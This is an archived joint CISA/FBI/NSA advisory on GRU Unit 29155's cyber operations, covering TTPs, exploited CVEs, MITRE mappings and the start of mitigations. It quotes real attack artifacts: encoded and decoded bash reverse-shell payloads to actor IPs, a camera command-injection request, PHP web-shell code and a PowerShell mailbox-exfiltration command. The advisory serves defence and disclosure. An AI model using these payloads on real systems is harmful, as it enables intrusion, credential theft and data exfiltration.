{ "id": "ed6d184f-5304-4010-91fb-80c70c238351", "created_at": "2026-04-06T00:07:39.207655Z", "updated_at": "2026-04-10T13:11:54.388907Z", "deleted_at": null, "sha1_hash": "09390340ca758f19c77c734684bb4670b3a5c0ae", "title": "Russian Military Cyber Actors Target US and Global Critical Infrastructure | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 427329, "plain_text": "Russian Military Cyber Actors Target US and Global Critical\r\nInfrastructure | CISA\r\nPublished: 2024-09-05 · Archived: 2026-04-05 18:19:43 UTC\r\nSummary\r\nThe Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security\r\nAgency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st\r\nSpecialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the\r\npurposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying\r\nthe destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. These\r\ncyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit\r\n74455.\r\nTo mitigate this malicious cyber activity, organizations should take the following actions today:\r\nPrioritize routine system updates and remediate known exploited vulnerabilities.\r\nSegment networks to prevent the spread of malicious activity.\r\nEnable phishing-resistant multifactor authentication (MFA) for all externally facing account services, especially for\r\nwebmail, virtual private networks (VPNs), and accounts that access critical systems.\r\nThis Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors—\r\nboth during and succeeding their deployment of WhisperGate against Ukraine—as well as further analysis (see Appendix\r\nA) of the WhisperGate malware initially published in the joint advisory, Destructive Malware Targeting Organizations in\r\nUkraine, published February 26, 2022.\r\nFBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber\r\noperations since 2020:\r\nU.S. Department of the Treasury\r\nU.S. Department of State (Rewards for Justice)\r\nU.S. Cyber Command Cyber National Mission Force (CNMF)\r\nNetherlands Defence Intelligence and Security Service (MIVD)\r\nCzech Military Intelligence (VZ)\r\nCzech Republic Security Information Service (BIS)\r\nGerman Federal Office for the Protection of the Constitution (BfV)\r\nEstonian Internal Security Service (KAPO)\r\nLatvian State Security Service (VDD)\r\nSecurity Service of Ukraine (SBU)\r\nComputer Emergency Response Team of Ukraine (CERT-UA)\r\nCanadian Security Intelligence Service (CSIS)\r\nCommunications Security Establishment Canada (CSE)\r\nAustralian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)\r\nUnited Kingdom National Cyber Security Centre (NCSC-UK)\r\nFor additional information on Russian state-sponsored malicious cyber activity and related indictments, see the recent U.S.\r\nDepartment of Justice (DOJ) press releases for June 26, 2024, and September 5, 2024, FBI’s Cyber Crime webpage, and\r\nCISA’s Russia Cyber Threat Overview and Advisories webpage.\r\nDownload the PDF version of this report:\r\nFor a downloadable copy of indicators of compromise (IOCs):\r\nTechnical Details\r\nNote: This advisory uses the MITRE ATT\u0026CK® Matrix for Enterprise framework, version 15. See the MITRE ATT\u0026CK\r\nTactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT\u0026CK tactics and techniques.\r\nGRU Unit 29155: Cyber Component\r\nFBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage and influence operations, and\r\nassassination attempts throughout Europe. Unit 29155 expanded their tradecraft to include offensive cyber operations since\r\nat least 2020. Unit 29155 cyber actors’ objectives appear to include the collection of information for espionage purposes,\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 1 of 20\n\nreputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the\r\ndestruction of data [T1485 ].\r\nFBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit\r\n29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through\r\nconducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors,\r\nincluding known cyber-criminals and enablers to conduct their operations.\r\nCybersecurity Industry Tracking\r\nThe cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to\r\nUnit 29155 cyber actors. While not all encompassing, the following are the most notable threat group names related under\r\nMITRE ATT\u0026CK G1003  and commonly used within the cybersecurity community.\r\nCadet Blizzard (formerly known as DEV-0586 by Microsoft)[1 ],[2 ]\r\nEmber Bear (also known as Bleeding Bear by CrowdStrike)[3 ]\r\nFrozenvista\r\nUNC2589[4 ]\r\nUAC-0056[5 ]\r\nNote: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1\r\ncorrelation to the U.S. Government’s understanding for all activity related to these groupings.\r\nVictimization\r\nIn addition to WhisperGate and other incidents against Ukraine, Unit 29155 cyber actors have conducted computer network\r\noperations against numerous members of the North Atlantic Treaty Organization (NATO) in Europe and North America, as\r\nwell as countries in Europe, Latin America, and Central Asia. The activity includes cyber campaigns such as website\r\ndefacements, infrastructure scanning, data exfiltration, and data leak operations. These actors sell or publicly release\r\nexfiltrated victim data obtained from their compromises. Since early 2022, the primary focus of the cyber actors appears to\r\nbe targeting and disrupting efforts to provide aid to Ukraine.\r\nTo date, the FBI has observed more than 14,000 instances of domain scanning across at least 26 NATO members and several\r\nadditional European Union (EU) countries. Unit 29155 cyber actors have defaced victim websites and used public website\r\ndomains to post exfiltrated victim information.\r\nWhether through offensive operations or scanning activity, Unit 29155 cyber actors are known to target critical\r\ninfrastructure and key resource sectors, including the government services, financial services, transportation systems,\r\nenergy, and healthcare sectors of NATO members, the EU, Central American, and Asian countries.\r\nTTP Overview\r\nReconnaissance\r\nUnit 29155 cyber actors have been observed targeting IP ranges [T1595.001 ] used within multiple government and\r\ncritical infrastructure organizations. The following are publicly available tools these cyber actors have used for scanning\r\n[T1595 ] and vulnerability exploit efforts. Unit 29155 cyber actors were not observed using these tools outside of their\r\nintended purpose. Note: Use of these tools should not be attributed as malicious without analytical evidence to support\r\nthreat actor use and/or control.\r\nAcunetix: Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and\r\nvulnerabilities for networks [T1595.002 ].[6 ]\r\nAmass: Unit 29155 cyber actors leveraged both Amass and VirusTotal to obtain subdomains for target websites\r\n[T1590.002 ].[7 ]\r\nDroopescan[8 ]\r\nJoomScan[9 ]\r\nMASSCAN: Unit 29155 cyber actors used MASSCAN and Nmap to discover other machines once inside victim\r\nnetworks.[10 ]\r\nNetcat[11 ]\r\nNmap: Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the\r\nNmap Scripting Engine [NSE]) to write custom scripts for discovering and scanning other machines [T1046 ].\r\nShodan: Unit 29155 cyber actors used Shodan to identify hosts with a specific set of vulnerabilities or device types\r\n[T1596.005 ].[12 ]\r\nVirusTotal[13 ]\r\nWPScan\r\nAdditionally, Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration [T1572 ] over\r\nport 1194, and in some instances, to perform Active Directory (AD) enumeration. Adminer in combination with Impacket\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 2 of 20\n\nand ldapdomaindump were tools used for gathering information on AD. Once active devices are found, Unit 29155 cyber\r\nactors look for vulnerabilities to exploit. For example, the Acunetix vulnerability scanning tool has been used for gathering\r\ninformation on potential vulnerabilities such as blind cross-site scripting, as shown in the following commands:\r\nGET /index.php?log=to@example.com\u003e%0d%0abcc:009247.3183-377.3183.1bf6c.19446.2@bxss.me\r\n\"GET /CMS/files/log.htm HTTP/1.1\" * * \"(nslookup hitccruvbrumn76c1b.bxss.me||perl -e\r\n\\\"gethostbyname('hitccruvbrumn76c1b.bxss.me')\\\")\"\r\nAs the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or\r\nmachines, they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure [T1588.005\r\n]. Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the\r\nfollowing CVEs:\r\nCVE-2020-1472 (Microsoft: Windows Server)\r\nCVE-2021-26084 (Atlassian Confluence Server and Data Center)\r\nCVE-2021-3156 (Red Hat: Privilege Escalation via Command Line Argument Parsing)\r\nCVE-2021-4034 (Red Hat: Polkit Privilege Escalation)\r\nCVE-2022-27666 (Red Hat: Heap Buffer Overflow Flaw)\r\nAnalysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access [T1190 ], as detailed\r\nthroughout this advisory:\r\nCVE-2021-33044 (Dahua Security)\r\nCVE-2021-33045 (Dahua Security)\r\nCVE-2022-26134 (Atlassian Confluence Server and Data Center)\r\nCVE-2022-26138 (Atlassian Confluence Server and Data Center)\r\nCVE-2022-3236 (Sophos: Firewall)\r\nResource Development\r\nRather than build custom solutions, Unit 29155 cyber actors use common red teaming techniques and publicly available\r\ntools to conduct cyber operations. As a result, many TTPs overlap with those of other cyber actors, which can lead to\r\nmisattribution.\r\nUnit 29155 actors and their cyber-criminal affiliates commonly maintain accounts on dark web forums; this has provided the\r\nopportunity to obtain various hacker tools such as malware and malware loaders [T1588.001 ] like Raspberry Robin and\r\nSaintBot. While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine, the use of\r\nWhisperGate is not unique to the group. Technical analysis can be found in Appendix A: WhisperGate Malware Analysis.\r\nInitial Access\r\nUnit 29155 cyber actors are known to use VPNs to anonymize their operational activity. These cyber actors commonly\r\nattempt to exploit weaknesses in internet-facing systems, like the CVEs listed above, to initially access networks. In one\r\ninstance, Unit 29155 cyber actors exploited CVE-2021-33044 and CVE-2021-33045 on Dahua IP cameras to bypass identity\r\nauthentication.\r\nLateral Movement\r\nUnit 29155 cyber actors have used Shodan to scan for Internet of Things (IoT) devices, using exploitation scripts to\r\nauthenticate to IP cameras with default usernames and passwords [T1078.001 ], and exfiltrating images [T1125 ] (JPG\r\nfiles). Attempts are then made to perform remote command execution via web to vulnerable IP cameras; if successful, cyber\r\nactors would dump configuration settings and credentials in plaintext (as shown in Table 1 below) [T1552.001 ].\r\nAppendix B: Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this section.\r\nNote: These events are independent and not correlated as a single timeline of compromise.\r\nEvent Victim Observation\r\nWeb requests\r\nobserved\r\nfrom victim\r\ninfrastructure\r\nThese requests are likely intended to dump configuration settings and credentials [T1003 ]:\r\nhxxp://\u003cIP\u003e:\u003cport\u003e/PictureCatch.cgi?username=\u003cNAME\u003e\u0026password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--\r\n%3e%22%3etmp/Login.htm%3b\u0026data_type=1\u0026attachment=1\u0026channel=1\u0026secret=1\u0026key=PWNED\r\nhxxp://\u003cIP\u003e:\u003cport\u003e/ssi.cgi/tmp/Login.htm\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 3 of 20\n\nEvent Victim Observation\r\nPOST\r\nrequests sent\r\nto victims\r\nwith\r\npayloads\r\n[T1071.001\r\n]\r\n\"txtUser=lol\u0026txtPassword=2\u0026btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties\u0026chRemember=on\u0026txtPassword=g00dPa%24%24w\r\ni%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22))%7d\"\r\n\"txtUser=lol\u0026txtPassword=2\u0026btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties\u0026chRemember=on\u0026txtPassword=g00dPa%24%24w\r\ni%20%3E%26%20%2Fdev%2Ftcp%2F81.17.24.130%2F6870%200%3E%261%22))%7d\"\r\nURL\r\nencoded\r\nvalues from\r\ntxtUser for\r\nboth\r\ncommands\r\ndecoded to\r\nembedded\r\nbash\r\ncommands\r\n${@print(system(\"bash -i \u003e\u0026 /dev/tcp/179.43.175.38/6870 0\u003e\u00261\"))}\r\n${@print(system(\"bash -i \u003e\u0026 /dev/tcp/81.17.24.130/6870 0\u003e\u00261\"))}\r\nIn addition, incident analysis identified the general observations listed below on victim infrastructure. Each event should be\r\nconsidered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and\r\ntimeframes. Appendix B: Indicators of Compromise lists IOCs associated with the observations in Table 1 and below.\r\nIn one instance shortly following a deployment of WhisperGate malware, Unit 29155 cyber actors exfiltrated data\r\nto  mega[.]nz using Rclone [T1567.002 ].\r\nUnit 29155 cyber actors used a Pass-the-Hash [T1550.002 ] via ProxyChains.\r\nCyber actors performed SSH and SSHPass executions.\r\nCyber actors initiated a web request and executed commands via ProxyChains. This included obtaining NT hashes\r\nvia Server Message Block (SMB) using smbclient, executing Windows Management Instrumentation (WMI) with\r\nhashes, and making web requests with resources i.php and tunnel.jsp . In one instance, cyber actors used\r\nsmbclient via ProxyChains to access internal network shares, and subsequently PSQL and MySQL clients to access\r\ninternal databases.\r\nCyber actors used Impacket for post-exploitation and lateral movement. The script secretsdump.py was used from\r\nthe Impacket framework to obtain domain credentials, while psexec.py was subsequently used to move laterally\r\nwithin a victim network.\r\nCyber actors used ntlmrelayx.py via Impacket and krbrelayx.py , which requires Impacket to function.\r\nCyber actors used Responder.py .\r\nCyber actors used su-bruteforce to brute force a selected user using the su command.\r\nCyber actors used BloodHound , an open source AD reconnaissance tool that can reveal hidden relationships and\r\nidentify attack paths within an AD environment.\r\nCyber actors used CrackMapExec via ProxyChains with SMB protocol targeting internal victim IP addresses. This\r\nopen source post-exploitation tool automates assessing the security of large AD networks.\r\nCyber actors used LinPEAS , an open source script designed to automate the process of searching for potential\r\nprivilege escalation vulnerabilities on a Linux victim.\r\nCyber actors used GO Simple Tunnel (GOST) (MD5: 896e0f54fc67d72d94b40d7885f10c51 ) for 30 days within one\r\nincident and against additional victims on various occasions. GOST is a tunneling tool designed to establish secure\r\nconnections between clients and servers, allowing for secure data transmission over untrusted networks.\r\nCyber actors used Through the Wire against a victim’s internet-facing Confluence server. Through the Wire is a proof\r\nof concept[14 ] exploit for CVE-2022-26134, an OGNL injection vulnerability allowing an unauthenticated user to\r\nexecute arbitrary code on a Confluence Server or Data Center instance. All versions of Confluence Server and Data\r\nCenter prior to the fixed versions listed by Atlassian are affected by this vulnerability.[15 ] A reverse shell over\r\nHTTPS was used to communicate over listening host on port 8081 .\r\nCyber actors initiated Nmap scans on localized web servers.\r\nCyber actors performed lateral movement from compromised web servers to exploit a corporate Microsoft Windows\r\nnetwork, commonly using psexec.py from the Impacket framework. The script secretsdump.py from the\r\nImpacket framework was used to obtain domain credentials.\r\nCyber actors may have used Raspberry Robin malware in the role of an access broker [T1588.001 ].\r\nCyber actors targeted victims’ Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain\r\nvalid usernames and passwords [T1110.003 ].\r\nCommand and Control\r\nInfrastructure\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 4 of 20\n\nSince at least 2020, Unit 29155 cyber actors have used virtual private servers (VPSs) [T1583.003 ] to host their\r\noperational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Use of VPSs are common\r\ndue to the associated IP addresses not identifying their true country of origin.\r\nPost-Exploitation\r\nWhen an exploit is successfully executed on a victim system, the actors can then launch a Meterpreter payload [T1105 ],\r\nwhich commonly uses a reverse Transmission Control Protocol (TCP) connection to initiate communication with the threat\r\nactors’ infrastructure [T1095 ]. In one instance, an established reverse TCP session was observed from victim to actor\r\ninfrastructure via the following ports:\r\n1234\r\n1851\r\n43221\r\n443\r\n4444\r\n4688\r\n5432\r\n8080\r\n8081\r\n8082\r\n8084\r\n8085\r\n8088\r\n8089\r\n8090\r\n8443\r\n8487\r\n8888\r\nAdditional observations were collected from victim engagement and analysis, including:\r\nUse of the Metasploit Framework to search for and/or access modules such as mysql , postgres , and ssh\r\nsoftware and features.\r\nUse of Meterpreter and Netcat to execute reverse shells over ports such as 8081.\r\nUse of Impacket.\r\nUse of PHP ( exp_door v1.0.2 , b374k , WSO 4.0.5 ) and the P.A.S. web shells [T1505.003 ], likely for initial\r\naccess.\r\nUse of EternalBlue.[16 ],[17 ]\r\nUse of reGeorg or Neo-reGeorg to set up a proxy to tunnel network traffic following compromise of a victim website,\r\nas well as use of ProxyChains to run Nmap within the network.\r\nEncrypted Communication\r\nOnce Unit 29155 cyber actors gain access to the victims’ internal network, the victims have observed:\r\n1. Using Domain Name System (DNS) tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic\r\n[T1071.004 ]. For example, Iodine was used to tunnel data via dns.test658324901domain.me .\r\n2. Configuring a proxy within the victim infrastructure and executing commands within the network via ProxyChains.\r\nProxyChains—a tool used to route internal traffic through a series of proxies [T1090.003 ]—has been used to\r\nprovide further anonymity and modify system configuration to force network traffic through chains of SOCKS5\r\nproxies and respective ports. The following ports used by actor infrastructure include:\r\n1. 1080\r\n2. 1333\r\n3. 13381\r\n4. 13391\r\n5. 13666\r\n6. 13871\r\n7. 1448\r\n8. 1888\r\n9. 3130\r\n10. 3140\r\n11. 4337\r\n12. 50001\r\n13. 8079\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 5 of 20\n\n3. Using the GOST open source tunneling tool (via SOCKS5 proxy) named java , as detailed in the following running\r\nprocesses in victim incident response results:\r\n8212 - SJ 0:02.54 HISTFILE=/dev/null\r\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\r\nLD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp\r\nPWD=/tmp/.ICE-unix HOME=/ RC PID=33980 ./java –L\r\nsocks5://127.0.0.1:13338\r\n8282 - IJ 0:03.98 HISTFILE=/dev/null\r\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\r\nLD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp\r\nPWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java –L\r\nrtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://{IP Address}:7896\r\n1. Modifying .php scripts to manipulate server-side operations, such as the observations listed in Table 2 below.\r\nScript (Base64 Decoded) Command Purpose \r\nusr/local/www/apache24/data/-\r\nredacted-/plugins/extension/oomla/oomla.php\r\nif (isset($ POST [\"sessionsid_wp\"]\r\n))\r\n{\r\n$poll id = $ POST [\"sessionsid_wp\")\r\n;\r\n$sessii = explode(\":\",\r\nbase64_decode($poll_id))\r\n;$sock=fsockopen($sessii[O)\r\n,$sessii[l));\r\n$proc=proc_open(/bin/sh -i),\r\narray(O=\u003e$sock, l=\u003e$sock,\r\n2=\u003e$sock) ,$pipes);\r\n}\r\nCreates\r\nsession.\r\nUsr/local/www/apache24/data/-\r\nredacted-/plugins/authentication/joomla/oomla.php\r\nfunction nb_res($a)\r\n{\r\neval(system('base64 decode ($a) ');\r\n}\r\nAllows\r\nprogram to\r\nrun.\r\nUsr/local/www/apache24/data/-\r\nredacted-/plugins/privacy/contact/contact.php\r\nif (isset($_POST['fl']))\r\n{\r\n$fl=$_POST['fl'] ;\r\n$f2=$_POST['f2'] ;\r\n$content = base64 decode($fl);\r\n$h = fopen($f2.\"w\");\r\n$text = \"$content\";\r\nfwrite($h.$text) ;\r\nfclose ($h) ;\r\n}\r\nAllows\r\nwriting to\r\nfiles.\r\nExfiltration\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 6 of 20\n\nIn several instances, analysis identified Unit 29155 cyber actors compressing victim data [T1560 ] (e.g., the entire\r\nfilesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. These cyber\r\nactors commonly use the command-line program Rclone to exfiltrate data to a remote location from victim infrastructure.\r\nUnit 29155 cyber actors have exfiltrated Windows processes and artifacts, such as Local Security Authority Subsystem\r\nService (LSASS) memory dumps [T1003.001 ], Security Accounts Manager (SAM) files [T1003.002 ], and SECURITY\r\nand SYSTEM event log files [T1654 ]. As seen in victim incident response results, actor infrastructure has also been used\r\nto compromise multiple mail servers [T1114 ] and exfiltrate mail artifacts, such as email messages, using PowerShell\r\n[T1059.001 ] via the following command:\r\npowershell New-MailboxExportRequest – Mailbox \u003cresource\u003e – FilePath `\\\\{IP Address}\\sharefolder\\1.pst`\r\nMITRE ATT\u0026CK Tactics and Techniques\r\nSee Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping\r\nmalicious cyber activity to the MITRE ATT\u0026CK framework, see CISA and MITRE ATT\u0026CK’s Best Practices for MITRE\r\nATT\u0026CK Mapping and CISA’s Decider Tool .\r\nTable 3: Reconnaissance\r\nTechnique Title ID Use\r\nGather Victim Network\r\nInformation: DNS\r\nT1590.002\r\nUnit 29155 cyber actors have used Amass and VirusTotal to obtain\r\ninformation about victims’ DNS for possible use during targeting, such as\r\nsubdomains for target websites.\r\nActive Scanning T1595\r\nUnit 29155 cyber actors use publicly available tools to gather information for\r\npossible use during targeting.\r\nActive Scanning:\r\nScanning IP Blocks\r\nT1595.001 Unit 29155 cyber actors use various open source scanning tools to scan for\r\nvictim IP ranges.\r\nActive Scanning:\r\nVulnerability Scanning\r\nT1595.002\r\nUnit 29155 cyber actors use publicly available scanning tools to enable their\r\ndiscovery of IoT devices and exploitable vulnerabilities. Tools leveraged for\r\nscanning include Acunetix, Amass, Droopescan, eScan, and JoomScan.\r\nSearch Open Technical\r\nDatabases: Scan\r\nDatabases\r\nT1596.005 Unit 29155 cyber actors use publicly available platforms like Shodan to\r\nidentify internet connected hosts.\r\nTable 4: Resource Development\r\nTechnique Title ID Use\r\nAcquire Infrastructure:\r\nVirtual Private Server\r\nT1583.003\r\nUnit 29155 cyber actors have used VPSs to host their operational tools,\r\nperform reconnaissance, exploit victim infrastructure, and exfiltrate victim\r\ndata.\r\nObtain Capabilities:\r\nMalware\r\nT1588.001\r\nUnit 29155 cyber actors obtain publicly available malware and malware\r\nloaders to support their operations. For example, analysis suggests Raspberry\r\nRobin malware may have been used in the role of an access broker.\r\nObtain Capabilities:\r\nExploits\r\nT1588.005 Unit 29155 cyber actors are known to obtain CVE exploit scripts from\r\nGitHub repositories and use them against victim infrastructure.\r\nTable 5: Initial Access\r\nTechnique Title ID Use\r\nValid Accounts:\r\nDefault Accounts\r\nT1078.001 Unit 29155 cyber actors use exploitation scripts to authenticate to IP cameras\r\nwith default usernames and passwords.\r\nExploit Public-Facing\r\nApplication\r\nT1190\r\nUnit 29155 cyber actors have used a variety of public exploits, including\r\nCVE-2021-33044, CVE-2021-33045, CVE-2022-26134, and CVE-2022-\r\n26138.\r\nThe proof of concept exploit for CVE-2022-26134, Through the Wire, has also\r\nbeen used against a victim’s internet-facing Confluence server.\r\nTable 6: Execution\r\nTechnique Title ID Use\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 7 of 20\n\nTechnique Title ID Use\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nT1059.001 Unit 29155 cyber actors have used PowerShell to execute\r\ncommands and other operational tasks.\r\nTable 7: Persistence\r\nTechnique Title ID Use\r\nServer Software Component: Web\r\nShell\r\nT1505.003 Unit 29155 cyber actors use web shells to establish persistent\r\naccess to systems.\r\nTable 8: Credential Access\r\nTechnique Title ID Use\r\nOS Credential Dumping:\r\nLSASS Memory\r\nT1003.001 Unit 29155 cyber actors have exfiltrated LSASS memory dumps to\r\nretrieve credentials from victim machines.\r\nOS Credential Dumping:\r\nSecurity Account Manager\r\nT1003.002 Unit 29155 cyber actors have exfiltrated usernames and hashed\r\npasswords from the SAM.\r\nBrute Force: Password\r\nSpraying\r\nT1110.003\r\nUnit 29155 cyber actors targeted victims’ Microsoft OWA\r\ninfrastructure with password spraying to obtain valid usernames and\r\npasswords.\r\nUnsecured Credentials:\r\nCredentials in Files\r\nT1552.001 Following exploitation of vulnerable IP cameras, Unit 29155 cyber\r\nactors dump configuration settings and credentials in plaintext.\r\nTable 9: Discovery\r\nTechnique Title ID Use\r\nNetwork Service\r\nDiscovery\r\nT1046\r\nOnce Unit 29155 cyber actors gained access to victim internal networks, they further\r\nused Nmap (via the NSE) to write custom scripts for discovering and scanning other\r\nmachines.\r\nLog Enumeration\r\nT1654 Unit 29155 cyber actors have enumerated and exfiltrated SECURITY and SYSTEM\r\nlogs.\r\nTable 10: Lateral Movement\r\nTechnique Title ID Use\r\nUse Alternate Authentication Material: Pass\r\nthe Hash\r\nT1550.002 Unit 29155 cyber actors used Pass-the-Hash to\r\nauthenticate via SMB.\r\nTable 11: Collection\r\nTechnique Title ID Use\r\nEmail Collection T1114\r\nUnit 29155 cyber actors have used their infrastructure to compromise\r\nmultiple victims’ mail servers and exfiltrate mail artifacts, such as email\r\nmessages.\r\nVideo Capture T1125\r\nUnit 29155 cyber actors have exploited IoT devices, specifically IP\r\ncameras with default usernames and passwords, and exfiltrated images.\r\nData from Information\r\nRepositories: Confluence\r\nT1213.001 Unit 29155 cyber actors leveraged Through the Wire against the victim’s\r\ninternet-facing Confluence server.\r\nArchive Collected Data T1560\r\nUnit 29155 cyber actors compress victim data (e.g., the entire filesystem,\r\nselect file system artifacts or user data, and/or database dumps) to send\r\nback to their infrastructure.\r\nTable 12: Command and Control\r\nTechnique Title ID Use\r\nProxy: Multi-hop\r\nProxy\r\nT1090.003\r\nUnit 29155 cyber actors executed commands via ProxyChains—a tool used to\r\nroute internal traffic through a series of proxies.\r\nProxyChains was also used to provide further anonymity and modify system\r\nconfiguration to force network traffic through chains of SOCKS5 proxies and\r\nrespective ports.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 8 of 20\n\nTechnique Title ID Use\r\nApplication Layer\r\nProtocol: Web\r\nProtocols\r\nT1071.001 Unit 29155 cyber actors use POST requests over HTTP to send payloads to\r\nvictims.\r\nApplication Layer\r\nProtocol: DNS\r\nT1071.004 Unit 29155 cyber actors used DNS tunneling tools, such as dnscat/2 and\r\nIodine, to tunnel IPv4 network traffic.\r\nNon-Application\r\nLayer Protocol\r\nT1095\r\nUnit 29155 cyber actors commonly use a reverse TCP connection to initiate\r\ncommunication with their infrastructure.\r\nIngress Tool Transfer T1105\r\nWhen an exploit is successfully executed on a victim system, Unit 29155\r\ncyber actors are known to launch the Meterpreter payload to initiate\r\ncommunication with their actor-controlled systems.\r\nProtocol Tunneling T1572\r\nUnit 29155 cyber actors have used infrastructure configured with OpenVPN\r\nconfiguration to tunnel traffic over a single port (1194), VPNs, and GOST to\r\nanonymize their operational activity.\r\nTable 13: Exfiltration\r\nTechnique Title ID Use\r\nExfiltration Over Web Service:\r\nExfiltration to Cloud Storage\r\nT1567.002 Unit 29155 cyber actors exfiltrated data to the cloud storage and\r\nfile hosting service, MEGA (mega[.]nz), using Rclone.\r\nTable 14: Impact\r\nTechnique Title  ID Use\r\nData Destruction T1485 Unit 29155 cyber actors’ objectives include the destruction of data.\r\nMitigations\r\nThe authoring agencies recommend organizations implement the mitigations supplied below to improve organizational\r\ncybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity\r\nPerformance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs\r\nprovide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and\r\nNIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful\r\nthreats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more\r\ninformation on the CPGs, including additional recommended baseline protections.\r\nLimit Adversarial Use of Common Vulnerabilities\r\nPrioritize patching to CISA’s Known Exploited Vulnerabilities Catalog, especially for CVEs identified in this\r\nadvisory, and then critical and high vulnerabilities that allow for remote code execution on internet-facing devices.\r\nConduct regular automated vulnerability scans to perform vulnerability assessments on all network resources\r\nbased on threat actor behaviors and known exploitable vulnerabilities (CISA CPG 1.E).\r\nLimit exploitable services on internet-facing assets, such as email and remote management protocols (CISA CPGs\r\n2.M, 2.W). Where necessary services must be exposed, such as services hosted in a demilitarized zone (DMZ),\r\nimplement the appropriate compensatory controls to prevent common forms of abuse and exploitation. Disable all\r\nunnecessary operating system applications and network protocols to combat adversary enumeration. For additional\r\nguidance, see CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems.\r\nU.S. organizations can utilize a range of CISA services at no cost, including vulnerability scanning and testing,\r\nto help organizations reduce exposure to threats. CISA Cyber Hygiene services can provide additional review of\r\ninternet-accessible assets and provide regular reports on steps to take to mitigate vulnerabilities. Email\r\nvulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services,” to get started.\r\nSoftware manufacturers, vendors, and consumers are encouraged to review CISA and NIST’s Defending Against\r\nSupply Chain Attacks. This publication provides an overview of software supply chain risks and recommendations\r\nfor how software customers and vendors can use the NIST Cyber Supply Chain Risk Management (C-SCRM)\r\nFramework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate software\r\nsupply chain risks. CISA recommends comprehensive mitigations for supply chain incident reporting, vulnerability\r\ndisclosing (e.g., security.txt), and choosing a trusted supplier or vendor that observes proper cyber security hygiene\r\n(CISA CPG 1.G, 1.H, 1.I) to defend against upstream attacks.\r\nDeploy Protective Controls and Architecture\r\nImplement network segmentation. Network segmentation can help prevent lateral movement by controlling traffic\r\nflows between—and access to—various subnetworks (CISA CPG 2.F). Best practice mitigations include updating\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 9 of 20\n\nIdentity and Access Management (IAM) and employing phishing-resistant MFA for all devices and accounts\r\nidentified as organizational assets. For additional guidance, see CISA and NSA’s IAM Recommended Best Practices\r\nGuide for Administrators (CISA CPG 2.H).\r\nVerify and ensure that sensitive data, including credentials, are not stored in plaintext and can only be\r\naccessed by authenticated and authorized users. Credentials must be stored in a secure manner, such as with a\r\ncredential/password manager to protect from malicious enumeration (CISA CPG 2.L).\r\nDisable and/or restrict use of command line 